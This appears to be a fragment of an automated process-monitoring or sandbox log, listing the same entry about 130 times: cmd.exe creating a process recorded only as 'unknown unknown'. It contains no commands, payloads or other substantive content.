Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|